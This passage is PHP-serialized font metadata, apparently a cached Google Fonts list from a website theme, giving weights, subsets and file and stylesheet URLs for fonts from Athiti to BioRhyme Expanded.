2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:6:{i:200;s:63:"http://fonts.gstatic.com/s/athiti/v1/Ge5skdKwzxRPajVLdOJuIg.ttf";i:300;s:63:"http://fonts.gstatic.com/s/athiti/v1/OoT7lj4AaSp1JpGJLKn3CA.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/athiti/v1/e7eiIKP18Iz9Kg1xat6AYw.ttf";i:500;s:63:"http://fonts.gstatic.com/s/athiti/v1/W3pP-ANXfsMOVOG-cqqMFw.ttf";i:600;s:63:"http://fonts.gstatic.com/s/athiti/v1/kYx3dtUYNEuUlzWczYzsmQ.ttf";i:700;s:63:"http://fonts.gstatic.com/s/athiti/v1/tyXFOxQyZGXfqHhtqSikdw.ttf";}s:4:"urls";a:6:{i:200;s:50:"https://fonts.googleapis.com/css?family=Athiti:200";i:300;s:50:"https://fonts.googleapis.com/css?family=Athiti:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Athiti:regular";i:500;s:50:"https://fonts.googleapis.com/css?family=Athiti:500";i:600;s:50:"https://fonts.googleapis.com/css?family=Athiti:600";i:700;s:50:"https://fonts.googleapis.com/css?family=Athiti:700";}}s:4:"atma";a:7:{s:4:"name";s:4:"Atma";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:7:"bengali";}s:5:"files";a:5:{i:300;s:61:"http://fonts.gstatic.com/s/atma/v1/noxn2r6cT3JgmEDt6Ip5pQ.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/atma/v1/dkXPrLoE_uqcgUFj4JdfRQ.ttf";i:500;s:61:"http://fonts.gstatic.com/s/atma/v1/Htksg3ZXeAEbSvUdTQX-uw.ttf";i:600;s:61:"http://fonts.gstatic.com/s/atma/v1/EGUwD65ZZn9IIHp5Y36b4A.ttf";i:700;s:61:"http://fonts.gstatic.com/s/atma/v1/-fkXl3wADUHjobbwO9d-Wg.ttf";}s:4:"urls";a:5:{i:300;s:48:"https://fonts.googleapis.com/css?family=Atma:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Atma:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Atma:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Atma:600";i:700;s:48:"https://fonts.googleapis.com/css?family=Atma:700";}}s:10:"atomic_age";a:7:{s:4:"name";s:10:"Atomic Age";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/atomicage/v7/WvBMe4FxANIKpo6Oi0mVJ_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Atomic+Age:regular";}}s:6:"aubrey";a:7:{s:4:"name";s:6:"Aubrey";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/aubrey/v8/zo9w8klO8bmOQIMajQ2aTA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Aubrey:regular";}}s:9:"audiowide";a:7:{s:4:"name";s:9:"Audiowide";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/audiowide/v4/yGcwRZB6VmoYhPUYT-mEow.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Audiowide:regular";}}s:10:"autour_one";a:7:{s:4:"name";s:10:"Autour One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/autourone/v5/2xmQBcg7FN72jaQRFZPIDvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Autour+One:regular";}}s:7:"average";a:7:{s:4:"name";s:7:"Average";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/average/v4/aHUibBqdDbVYl5FM48pxyQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Average:regular";}}s:12:"average_sans";a:7:{s:4:"name";s:12:"Average Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/averagesans/v4/dnU3R-5A_43y5bIyLztPsS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Average+Sans:regular";}}s:19:"averia_gruesa_libre";a:7:{s:4:"name";s:19:"Averia Gruesa Libre";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/averiagruesalibre/v4/10vbZTOoN6T8D-nvDzwRFyXcKHuZXlCN8VkWHpkUzKM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=Averia+Gruesa+Libre:regular";}}s:12:"averia_libre";a:7:{s:4:"name";s:12:"Averia Libre";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:6:{i:300;s:89:"http://fonts.gstatic.com/s/averialibre/v4/r6hGL8sSLm4dTzOPXgx5XacQoVhARpoaILP7amxE_8g.ttf";s:9:"300italic";s:89:"http://fonts.gstatic.com/s/averialibre/v4/I6wAYuAvOgT7el2ePj2nkina0FLWfcB-J_SAYmcAXaI.ttf";s:7:"regular";s:89:"http://fonts.gstatic.com/s/averialibre/v4/rYVgHZZQICWnhjguGsBspC3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/averialibre/v4/1etzuoNxVHR8F533EkD1WfMZXuCXbOrAvx5R0IT5Oyo.ttf";i:700;s:89:"http://fonts.gstatic.com/s/averialibre/v4/r6hGL8sSLm4dTzOPXgx5XUD2ttfZwueP-QU272T9-k4.ttf";s:9:"700italic";s:89:"http://fonts.gstatic.com/s/averialibre/v4/I6wAYuAvOgT7el2ePj2nkvAs9-1nE9qOqhChW0m4nDE.ttf";}s:4:"urls";a:6:{i:300;s:56:"https://fonts.googleapis.com/css?family=Averia+Libre:300";s:9:"300italic";s:62:"https://fonts.googleapis.com/css?family=Averia+Libre:300italic";s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Averia+Libre:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Averia+Libre:italic";i:700;s:56:"https://fonts.googleapis.com/css?family=Averia+Libre:700";s:9:"700italic";s:62:"https://fonts.googleapis.com/css?family=Averia+Libre:700italic";}}s:17:"averia_sans_libre";a:7:{s:4:"name";s:17:"Averia Sans Libre";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:6:{i:300;s:93:"http://fonts.gstatic.com/s/averiasanslibre/v4/_9-jTfQjaBsWAF_yp5z-V4CP_KG_g80s1KXiBtJHoNc.ttf";s:9:"300italic";s:93:"http://fonts.gstatic.com/s/averiasanslibre/v4/o7BEIK-fG3Ykc5Rzteh88YuyGu4JqttndUh4gRKxic0.ttf";s:7:"regular";s:93:"http://fonts.gstatic.com/s/averiasanslibre/v4/yRJpjT39KxACO9F31mj_LqV8_KRn4epKAjTFK1s1fsg.ttf";s:6:"italic";s:93:"http://fonts.gstatic.com/s/averiasanslibre/v4/COEzR_NPBSUOl3pFwPbPoCZU2HnUZT1xVKaIrHDioao.ttf";i:700;s:93:"http://fonts.gstatic.com/s/averiasanslibre/v4/_9-jTfQjaBsWAF_yp5z-V8QwVOrz1y5GihpZmtKLhlI.ttf";s:9:"700italic";s:93:"http://fonts.gstatic.com/s/averiasanslibre/v4/o7BEIK-fG3Ykc5Rzteh88bXy1DXgmJcVtKjM5UWamMs.ttf";}s:4:"urls";a:6:{i:300;s:61:"https://fonts.googleapis.com/css?family=Averia+Sans+Libre:300";s:9:"300italic";s:67:"https://fonts.googleapis.com/css?family=Averia+Sans+Libre:300italic";s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Averia+Sans+Libre:regular";s:6:"italic";s:64:"https://fonts.googleapis.com/css?family=Averia+Sans+Libre:italic";i:700;s:61:"https://fonts.googleapis.com/css?family=Averia+Sans+Libre:700";s:9:"700italic";s:67:"https://fonts.googleapis.com/css?family=Averia+Sans+Libre:700italic";}}s:18:"averia_serif_libre";a:7:{s:4:"name";s:18:"Averia Serif Libre";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:6:{i:300;s:94:"http://fonts.gstatic.com/s/averiaseriflibre/v5/yvITAdr5D1nlsdFswJAb8SmC4gFJ2PHmfdVKEd_5S9M.ttf";s:9:"300italic";s:94:"http://fonts.gstatic.com/s/averiaseriflibre/v5/YOLFXyye4sZt6AZk1QybCG2okl0bU63CauowU4iApig.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/averiaseriflibre/v5/fdtF30xa_Erw0zAzOoG4BZqY66i8AUyI16fGqw0iAew.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/averiaseriflibre/v5/o9qhvK9iT5iDWfyhQUe-6Ru_b0bTq5iipbJ9hhgHJ6U.ttf";i:700;s:94:"http://fonts.gstatic.com/s/averiaseriflibre/v5/yvITAdr5D1nlsdFswJAb8Q50KV5TaOVolur4zV2iZsg.ttf";s:9:"700italic";s:94:"http://fonts.gstatic.com/s/averiaseriflibre/v5/YOLFXyye4sZt6AZk1QybCNxohRXP4tNDqG3X4Hqn21k.ttf";}s:4:"urls";a:6:{i:300;s:62:"https://fonts.googleapis.com/css?family=Averia+Serif+Libre:300";s:9:"300italic";s:68:"https://fonts.googleapis.com/css?family=Averia+Serif+Libre:300italic";s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Averia+Serif+Libre:regular";s:6:"italic";s:65:"https://fonts.googleapis.com/css?family=Averia+Serif+Libre:italic";i:700;s:62:"https://fonts.googleapis.com/css?family=Averia+Serif+Libre:700";s:9:"700italic";s:68:"https://fonts.googleapis.com/css?family=Averia+Serif+Libre:700italic";}}s:10:"bad_script";a:7:{s:4:"name";s:10:"Bad Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/badscript/v5/cRyUs0nJ2eMQFHwBsZNRXfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Bad+Script:regular";}}s:5:"baloo";a:7:{s:4:"name";s:5:"Baloo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/baloo/v1/uFkbq9GEAWUcT0XNeptJ1Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Baloo:regular";}}s:10:"baloo_bhai";a:7:{s:4:"name";s:10:"Baloo Bhai";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/baloobhai/v1/FQvpC-04bh2QINuWAdnNW_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Baloo+Bhai:regular";}}s:12:"baloo_bhaina";a:7:{s:4:"name";s:12:"Baloo Bhaina";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:5:"oriya";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/baloobhaina/v1/HxxbxOVf9WQem_hKo1MXSi3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Baloo+Bhaina:regular";}}s:13:"baloo_chettan";a:7:{s:4:"name";s:13:"Baloo Chettan";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:9:"malayalam";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/baloochettan/v1/ODsFofLybGVOJ90e_EwdFbyYXtM25qb63HASTPtoTFA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Baloo+Chettan:regular";}}s:8:"baloo_da";a:7:{s:4:"name";s:8:"Baloo Da";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:7:"bengali";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/balooda/v1/RAJ0l2eJl_HDURCVxRE1iQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Baloo+Da:regular";}}s:11:"baloo_paaji";a:7:{s:4:"name";s:11:"Baloo Paaji";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:8:"gurmukhi";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/baloopaaji/v1/KeqAjVRzso6QUEfpMLQ-7KCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Baloo+Paaji:regular";}}s:11:"baloo_tamma";a:7:{s:4:"name";s:11:"Baloo Tamma";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:7:"kannada";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/balootamma/v1/-FKAYy14SAfG8Gc6YAAaMaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Baloo+Tamma:regular";}}s:12:"baloo_thambi";a:7:{s:4:"name";s:12:"Baloo Thambi";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/baloothambi/v1/qXK3dZIeU-O-HruaN5cK0y3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Baloo+Thambi:regular";}}s:9:"balthazar";a:7:{s:4:"name";s:9:"Balthazar";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/balthazar/v5/WgbaSIs6dJAGXJ0qbz2xlw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Balthazar:regular";}}s:7:"bangers";a:7:{s:4:"name";s:7:"Bangers";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/bangers/v8/WAffdge5w99Xif-DLeqmcA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Bangers:regular";}}s:5:"basic";a:7:{s:4:"name";s:5:"Basic";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/basic/v6/hNII2mS5Dxw5C0u_m3mXgA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Basic:regular";}}s:10:"battambang";a:7:{s:4:"name";s:10:"Battambang";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/battambang/v9/MzrUfQLefYum5vVGM3EZVPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:88:"http://fonts.gstatic.com/s/battambang/v9/dezbRtMzfzAA99DmrCYRMgJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Battambang:regular";i:700;s:54:"https://fonts.googleapis.com/css?family=Battambang:700";}}s:7:"baumans";a:7:{s:4:"name";s:7:"Baumans";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/baumans/v5/o0bFdPW1H5kd5saqqOcoVg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Baumans:regular";}}s:5:"bayon";a:7:{s:4:"name";s:5:"Bayon";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/bayon/v8/yTubusjTnpNRZwA4_50iVw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Bayon:regular";}}s:8:"belgrano";a:7:{s:4:"name";s:8:"Belgrano";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/belgrano/v6/iq8DUa2s7g6WRCeMiFrmtQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Belgrano:regular";}}s:7:"belleza";a:7:{s:4:"name";s:7:"Belleza";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/belleza/v4/wchA3BWJlVqvIcSeNZyXew.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Belleza:regular";}}s:9:"benchnine";a:7:{s:4:"name";s:9:"BenchNine";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{i:300;s:87:"http://fonts.gstatic.com/s/benchnine/v4/ah9xtUy9wLQ3qnWa2p-piS3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/benchnine/v4/h3OAlYqU3aOeNkuXgH2Q2w.ttf";i:700;s:87:"http://fonts.gstatic.com/s/benchnine/v4/qZpi6ZVZg3L2RL_xoBLxWS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:3:{i:300;s:53:"https://fonts.googleapis.com/css?family=BenchNine:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=BenchNine:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=BenchNine:700";}}s:7:"bentham";a:7:{s:4:"name";s:7:"Bentham";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/bentham/v6/5-Mo8Fe7yg5tzV0GlQIuzQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Bentham:regular";}}s:15:"berkshire_swash";a:7:{s:4:"name";s:15:"Berkshire Swash";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/berkshireswash/v4/4RZJjVRPjYnC2939hKCAimKfbtsIjCZP_edQljX9gR0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Berkshire+Swash:regular";}}s:5:"bevan";a:7:{s:4:"name";s:5:"Bevan";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/bevan/v7/Rtg3zDsCeQiaJ_Qno22OJA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Bevan:regular";}}s:13:"bigelow_rules";a:7:{s:4:"name";s:13:"Bigelow Rules";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/bigelowrules/v4/FEJCPLwo07FS-6SK6Al50X8f0n03UdmQgF_CLvNR2vg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Bigelow+Rules:regular";}}s:11:"bigshot_one";a:7:{s:4:"name";s:11:"Bigshot One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/bigshotone/v6/wSyZjBNTWDQHnvWE2jt6j6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Bigshot+One:regular";}}s:5:"bilbo";a:7:{s:4:"name";s:5:"Bilbo";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/bilbo/v6/-ty-lPs5H7OIucWbnpFrkA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Bilbo:regular";}}s:16:"bilbo_swash_caps";a:7:{s:4:"name";s:16:"Bilbo Swash Caps";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/bilboswashcaps/v7/UB_-crLvhx-PwGKW1oosDmYeFSdnSpRYv5h9gpdlD1g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Bilbo+Swash+Caps:regular";}}s:8:"biorhyme";a:7:{s:4:"name";s:8:"BioRhyme";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"700";i:4;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:5:{i:200;s:86:"http://fonts.gstatic.com/s/biorhyme/v1/bj-6g_1gJHCc9xQZtLWL36CWcynf_cDxXwCLxiixG1c.ttf";i:300;s:86:"http://fonts.gstatic.com/s/biorhyme/v1/jWqHmLFlu30n7xp12uZd8qCWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/biorhyme/v1/n6v5UkVPy_CjbP3fvsu1CA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/biorhyme/v1/36KN76U1iKt5TFDm2lBz0KCWcynf_cDxXwCLxiixG1c.ttf";i:800;s:86:"http://fonts.gstatic.com/s/biorhyme/v1/k6bYbUnESjLYnworWvSTL6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:5:{i:200;s:52:"https://fonts.googleapis.com/css?family=BioRhyme:200";i:300;s:52:"https://fonts.googleapis.com/css?family=BioRhyme:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=BioRhyme:regular";i:700;s:52:"https://fonts.googleapis.com/css?family=BioRhyme:700";i:800;s:52:"https://fonts.googleapis.com/css?family=BioRhyme:800";}}s:17:"biorhyme_expanded";a:7:{s:4:"name";s:17:"BioRhyme Expanded";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"700";i:4;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:5:{i:200;s:94:"http://fonts.gstatic.com/s/biorhymeexpanded/v2/FKL4Vyxmq2vsiDrSOzz2sC7oxZzNh3ej55UHm-HviBI.ttf";i:300;s:94:"http://fonts.gstatic.com/s/biorhymeexpanded/v2/FKL4Vyxmq2vsiDrSOzz2sFu4cYPPksG4MRjB5UiYPPw.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/biorhymeexpanded/v2/hgBNpgjTRZzGmZxqN5OuVjndr_hij4ilAk2n1d1AhsE.ttf";i:700;s:94:"http://fonts.gstatic.com/s/biorhymeexpanded/v2/FKL4Vyxmq2vsiDrSOzz2sMVisRVfPEfQ0jijOMQbr0Q.ttf";i:800;s:94:"http://fonts.gstatic.com/s/biorhymeexpanded/v2/FKL4Vyxmq2vsiDrSOzz2sIv1v1eCT6RPbcYZYQ1T1CE.ttf";}s:4:"urls";a:5:{i:200;s:61:"https://fonts.googleapis.com/css?family=BioRhyme+Expanded:200";i:300;s:61:"https://fonts.googleapis.com/css?family=BioRhyme+Expanded:300";s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=BioRhyme+Expanded:regular";i:700;s:61:"https://fonts.googleapis.com/css?family=BioRhy